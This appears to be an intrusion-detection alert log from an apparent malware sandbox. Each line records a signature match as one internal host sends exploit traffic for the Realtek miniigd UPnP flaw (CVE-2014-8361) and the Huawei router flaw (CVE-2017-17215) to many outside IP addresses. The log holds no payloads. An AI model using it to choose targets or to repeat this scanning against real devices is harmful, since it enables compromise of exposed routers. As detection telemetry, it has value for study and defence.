                                                07/20/24-23:06:01.244191TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615476452869192.168.2.14145.179.60.133
                                                07/20/24-23:05:35.736604TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4850052869192.168.2.1414.90.249.72
                                                07/20/24-23:05:57.544809TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3690252869192.168.2.14216.40.246.6
                                                07/20/24-23:05:52.466707TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4883252869192.168.2.14126.177.224.75
                                                07/20/24-23:05:58.834336TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5311252869192.168.2.1432.213.80.182
                                                07/20/24-23:05:37.489725TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4720852869192.168.2.1447.85.1.133
                                                07/20/24-23:05:42.221844TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5265037215192.168.2.14111.250.239.82
                                                07/20/24-23:06:34.098635TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614319052869192.168.2.1485.131.139.189
                                                07/20/24-23:05:37.575244TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24774052869192.168.2.1435.159.139.53
                                                07/20/24-23:07:37.787409TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5974852869192.168.2.14200.217.154.137
                                                07/20/24-23:06:32.467103TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613457452869192.168.2.1493.45.90.55
                                                07/20/24-23:05:33.862992TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4332037215192.168.2.14197.220.34.254
                                                07/20/24-23:06:25.391346TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3533252869192.168.2.14168.223.81.132
                                                07/20/24-23:05:58.549030TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25570052869192.168.2.14148.242.100.157
                                                07/20/24-23:05:38.774187TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614105252869192.168.2.14126.4.218.232
                                                07/20/24-23:07:33.760297TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4990852869192.168.2.14152.214.0.28
                                                07/20/24-23:06:00.171719TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5521652869192.168.2.14109.93.236.93
                                                07/20/24-23:05:40.468265TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5904852869192.168.2.1464.79.183.126
                                                07/20/24-23:05:56.086216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4211437215192.168.2.14197.115.183.115
                                                07/20/24-23:06:06.729623TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5414652869192.168.2.14205.68.5.52
                                                07/20/24-23:06:38.250934TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615550052869192.168.2.14160.143.127.233
                                                07/20/24-23:06:03.378832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5331837215192.168.2.14197.254.127.131
                                                07/20/24-23:05:47.508612TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5803452869192.168.2.14155.98.10.133
                                                07/20/24-23:06:02.940936TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3965852869192.168.2.1435.213.181.62
                                                07/20/24-23:05:34.626588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3676437215192.168.2.1441.74.40.186
                                                07/20/24-23:05:40.423413TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24108452869192.168.2.1418.146.210.210
                                                07/20/24-23:06:03.111758TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3887452869192.168.2.14203.213.32.135
                                                07/20/24-23:06:32.673677TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615156852869192.168.2.14217.175.14.4
                                                07/20/24-23:05:56.121210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4481237215192.168.2.1441.241.41.15
                                                07/20/24-23:05:38.008589TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613710852869192.168.2.1462.189.116.240
                                                07/20/24-23:05:35.495332TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5235852869192.168.2.14191.30.146.121
                                                07/20/24-23:05:57.437168TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25082052869192.168.2.14148.121.201.0
                                                07/20/24-23:07:08.490661TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24206252869192.168.2.1484.62.152.144
                                                07/20/24-23:06:01.181584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5872052869192.168.2.14160.54.17.66
                                                07/20/24-23:06:23.270832TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3635052869192.168.2.14217.29.231.50
                                                07/20/24-23:05:46.135626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823037215192.168.2.14197.136.240.59
                                                07/20/24-23:06:14.572816TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615267052869192.168.2.1453.151.155.201
                                                07/20/24-23:07:07.844201TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5217252869192.168.2.14196.38.105.244
                                                07/20/24-23:05:38.957923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4959237215192.168.2.1467.61.31.157
                                                07/20/24-23:06:10.473848TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613378652869192.168.2.14160.153.18.205
                                                07/20/24-23:07:07.493314TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6051252869192.168.2.14216.158.254.36
                                                07/20/24-23:05:47.105578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5701437215192.168.2.1441.89.89.168
                                                07/20/24-23:05:37.985424TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4067252869192.168.2.14119.238.64.83
                                                07/20/24-23:06:01.446118TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25856252869192.168.2.14211.231.173.53
                                                07/20/24-23:05:50.479091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4347237215192.168.2.1467.230.220.76
                                                07/20/24-23:05:36.325898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6053037215192.168.2.14204.51.37.135
                                                07/20/24-23:06:00.052134TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615832452869192.168.2.14150.193.47.116
                                                07/20/24-23:06:33.955473TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613428452869192.168.2.1474.208.169.182
                                                07/20/24-23:06:08.182697TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4749052869192.168.2.14122.13.119.12
                                                07/20/24-23:05:33.855567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5636437215192.168.2.1441.135.32.84
                                                07/20/24-23:06:07.980733TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23783052869192.168.2.14101.195.118.86
                                                07/20/24-23:05:59.443720TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4527052869192.168.2.1471.105.97.148
                                                07/20/24-23:05:52.589392TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25213452869192.168.2.1449.62.131.203
                                                07/20/24-23:05:37.489725TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23638852869192.168.2.1438.130.134.142
                                                07/20/24-23:05:40.355569TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25667452869192.168.2.1478.158.185.24
                                                07/20/24-23:05:42.238265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3798637215192.168.2.14157.205.57.71
                                                07/20/24-23:06:00.620754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3511237215192.168.2.14192.243.188.52
                                                07/20/24-23:05:52.531088TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5746452869192.168.2.14184.34.105.168
                                                07/20/24-23:06:23.212855TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614610852869192.168.2.14169.212.196.147
                                                07/20/24-23:05:57.002874TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615550852869192.168.2.14113.250.68.242
                                                07/20/24-23:05:56.088545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5456237215192.168.2.1441.239.139.75
                                                07/20/24-23:05:59.915135TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3826052869192.168.2.1452.245.58.49
                                                07/20/24-23:05:58.165543TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613820252869192.168.2.1412.80.117.177
                                                07/20/24-23:06:01.482595TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5922452869192.168.2.1449.116.114.195
                                                07/20/24-23:06:11.351053TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3483452869192.168.2.142.134.130.207
                                                07/20/24-23:06:16.287042TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6015452869192.168.2.141.136.131.140
                                                07/20/24-23:05:57.179441TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23709652869192.168.2.14199.172.167.2
                                                07/20/24-23:06:18.420371TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614682452869192.168.2.14106.9.209.36
                                                07/20/24-23:06:03.171950TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23824252869192.168.2.1495.214.15.233
                                                07/20/24-23:06:24.632253TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614983852869192.168.2.14150.246.129.82
                                                07/20/24-23:06:00.452299TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3961452869192.168.2.14216.168.149.77
                                                07/20/24-23:05:37.454499TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4886052869192.168.2.14153.104.11.80
                                                07/20/24-23:06:27.853068TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3406052869192.168.2.145.117.210.100
                                                07/20/24-23:06:01.650758TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5101852869192.168.2.1496.167.251.238
                                                07/20/24-23:07:06.736138TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23912652869192.168.2.14139.145.62.207
                                                07/20/24-23:05:56.439868TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5711852869192.168.2.1437.110.135.88
                                                07/20/24-23:05:42.131789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4200237215192.168.2.1441.233.102.86
                                                07/20/24-23:05:40.471609TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23713652869192.168.2.1498.239.232.196
                                                07/20/24-23:06:02.691312TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24406252869192.168.2.14222.129.187.194
                                                07/20/24-23:05:37.441224TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3853852869192.168.2.14184.192.255.233
                                                07/20/24-23:05:52.544972TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25058052869192.168.2.1462.154.246.173
                                                07/20/24-23:05:59.042861TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23768452869192.168.2.14216.40.246.6
                                                07/20/24-23:05:57.164212TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614033452869192.168.2.1438.235.221.67
                                                07/20/24-23:05:39.025518TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5797852869192.168.2.1413.60.62.114
                                                07/20/24-23:05:42.256029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4940437215192.168.2.14157.150.107.102
                                                07/20/24-23:05:57.204945TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615274252869192.168.2.1432.213.80.182
                                                07/20/24-23:05:39.050437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6081837215192.168.2.14157.67.182.150
                                                07/20/24-23:05:59.205784TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5337252869192.168.2.14198.211.160.55
                                                07/20/24-23:05:48.783693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026237215192.168.2.14157.42.31.161
                                                07/20/24-23:05:56.079797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6080037215192.168.2.14157.37.77.50
                                                07/20/24-23:05:39.362477TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5702252869192.168.2.1443.253.131.181
                                                07/20/24-23:05:57.906796TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615861452869192.168.2.14148.241.191.50
                                                07/20/24-23:05:57.432998TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3958452869192.168.2.14159.135.65.187
                                                07/20/24-23:06:12.712041TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615471652869192.168.2.14207.178.205.35
                                                07/20/24-23:05:38.250288TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3308252869192.168.2.14204.155.193.18
                                                07/20/24-23:05:40.462607TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25786452869192.168.2.1468.68.58.116
                                                07/20/24-23:05:52.503773TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24406252869192.168.2.14132.178.41.100
                                                07/20/24-23:06:00.078168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4227252869192.168.2.14140.144.188.149
                                                07/20/24-23:06:04.395456TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615115452869192.168.2.14173.224.217.200
                                                07/20/24-23:05:33.833027TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3537637215192.168.2.14189.228.237.19
                                                07/20/24-23:05:58.771763TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5424652869192.168.2.1423.176.211.236
                                                07/20/24-23:05:37.447452TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24637252869192.168.2.1462.135.228.95
                                                07/20/24-23:05:48.748554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3748037215192.168.2.14157.242.85.182
                                                07/20/24-23:05:56.038244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4813637215192.168.2.1452.102.23.251
                                                07/20/24-23:07:32.121311TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23956452869192.168.2.1469.155.223.182
                                                07/20/24-23:05:57.540063TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3663452869192.168.2.14122.131.100.31
                                                07/20/24-23:05:42.131789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4927637215192.168.2.1441.169.68.169
                                                07/20/24-23:06:11.251823TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5450452869192.168.2.142.53.21.232
                                                07/20/24-23:06:00.464582TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615528452869192.168.2.14180.44.235.174
                                                07/20/24-23:05:57.122985TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24145652869192.168.2.1423.45.171.168
                                                07/20/24-23:06:09.697115TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3515852869192.168.2.14220.251.11.9
                                                07/20/24-23:05:39.879670TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613841052869192.168.2.14119.64.194.144
                                                07/20/24-23:05:56.058256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5932637215192.168.2.1449.154.62.137
                                                07/20/24-23:06:03.755462TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4602252869192.168.2.14187.76.135.2
                                                07/20/24-23:05:52.460913TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24923452869192.168.2.1482.30.99.23
                                                07/20/24-23:05:52.488878TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24094052869192.168.2.14169.220.199.128
                                                07/20/24-23:06:05.754581TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5013452869192.168.2.1424.118.233.225
                                                07/20/24-23:06:03.018252TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615951252869192.168.2.1465.118.0.140
                                                07/20/24-23:05:57.024016TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613607852869192.168.2.14168.222.92.221
                                                07/20/24-23:05:37.556779TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24111452869192.168.2.14111.8.128.237
                                                07/20/24-23:05:48.121390TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4465452869192.168.2.1412.241.78.51
                                                07/20/24-23:05:50.501247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3755837215192.168.2.1441.230.29.166
                                                07/20/24-23:05:52.697720TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23987052869192.168.2.1420.39.144.53
                                                07/20/24-23:05:42.220682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3612237215192.168.2.1441.75.174.238
                                                07/20/24-23:05:34.653253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4995037215192.168.2.14157.76.186.37
                                                07/20/24-23:05:35.307399TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4704652869192.168.2.14192.216.183.201
                                                07/20/24-23:06:09.610819TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614017252869192.168.2.14162.172.126.29
                                                07/20/24-23:07:03.190387TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5788452869192.168.2.14132.21.47.22
                                                07/20/24-23:06:16.190479TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5399252869192.168.2.1446.33.233.116
                                                07/20/24-23:05:57.944258TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25479652869192.168.2.14108.132.143.152
                                                07/20/24-23:05:40.421092TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3710452869192.168.2.14191.156.105.201
                                                07/20/24-23:05:58.860933TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4773052869192.168.2.14163.92.171.162
                                                07/20/24-23:05:57.454187TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5173452869192.168.2.14162.11.26.228
                                                07/20/24-23:05:58.415863TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614129852869192.168.2.14107.64.165.241
                                                07/20/24-23:05:57.109755TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4103052869192.168.2.14179.58.179.48
                                                07/20/24-23:05:58.789977TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4797852869192.168.2.1468.139.170.193
                                                07/20/24-23:05:37.440307TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4481052869192.168.2.14174.38.108.83
                                                07/20/24-23:05:52.572723TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3421652869192.168.2.14196.214.249.37
                                                07/20/24-23:06:06.896657TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5350052869192.168.2.14117.185.208.242
                                                07/20/24-23:06:50.079146TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5363652869192.168.2.14149.61.158.243
                                                07/20/24-23:05:48.841499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4157837215192.168.2.14197.28.221.234
                                                07/20/24-23:05:48.801547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5899637215192.168.2.1441.84.25.72
                                                07/20/24-23:05:39.680161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5062237215192.168.2.14197.119.68.120
                                                07/20/24-23:05:45.376608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3662437215192.168.2.14197.7.199.54
                                                07/20/24-23:05:42.220682TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4698837215192.168.2.14157.42.83.151
                                                07/20/24-23:05:57.233976TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5936452869192.168.2.1458.37.104.40
                                                07/20/24-23:05:36.354373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5153437215192.168.2.1458.64.123.253
                                                07/20/24-23:05:40.333807TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23448452869192.168.2.1448.151.66.255
                                                07/20/24-23:05:58.334968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5236452869192.168.2.14159.109.243.206
                                                07/20/24-23:06:05.867545TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615659252869192.168.2.1451.58.43.253
                                                07/20/24-23:05:46.763392TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615879252869192.168.2.14170.66.204.146
                                                07/20/24-23:05:47.264642TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5934452869192.168.2.1413.143.242.72
                                                07/20/24-23:05:50.542034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3297637215192.168.2.1441.2.22.176
                                                07/20/24-23:06:04.969328TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5908052869192.168.2.1441.93.92.223
                                                07/20/24-23:05:56.069521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5658237215192.168.2.14157.13.195.107
                                                07/20/24-23:05:35.846905TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614054652869192.168.2.14163.170.37.61
                                                07/20/24-23:05:48.756259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5420637215192.168.2.14157.136.202.82
                                                07/20/24-23:05:58.104584TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4108852869192.168.2.14122.54.20.32
                                                07/20/24-23:06:21.974243TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5098852869192.168.2.14148.189.41.218
                                                07/20/24-23:05:45.284179TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4009052869192.168.2.14223.161.15.138
                                                07/20/24-23:06:04.571848TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5491452869192.168.2.1417.240.156.181
                                                07/20/24-23:06:18.501276TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614862252869192.168.2.14166.249.41.209
                                                07/20/24-23:05:33.853184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081837215192.168.2.14157.182.246.174
                                                07/20/24-23:05:33.861759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5817637215192.168.2.1441.212.142.21
                                                07/20/24-23:05:57.470552TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4586252869192.168.2.1447.88.146.78
                                                07/20/24-23:06:00.152056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5817852869192.168.2.1438.52.11.189
                                                07/20/24-23:06:24.472445TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4789852869192.168.2.1486.184.56.189
                                                07/20/24-23:06:02.066021TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5012452869192.168.2.1493.60.39.218
                                                07/20/24-23:05:40.471609TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5436052869192.168.2.1439.183.105.121
                                                07/20/24-23:06:11.511898TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615789252869192.168.2.14123.24.215.201
                                                07/20/24-23:05:45.403074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4097237215192.168.2.14157.56.159.89
                                                07/20/24-23:06:57.758895TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5712452869192.168.2.14147.111.251.208
                                                07/20/24-23:05:48.072385TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5435852869192.168.2.14171.64.212.60
                                                07/20/24-23:05:33.860838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4530037215192.168.2.14157.204.130.3
                                                07/20/24-23:05:40.488770TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25457452869192.168.2.1434.198.48.42
                                                07/20/24-23:05:46.340010TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615719452869192.168.2.1460.143.208.198
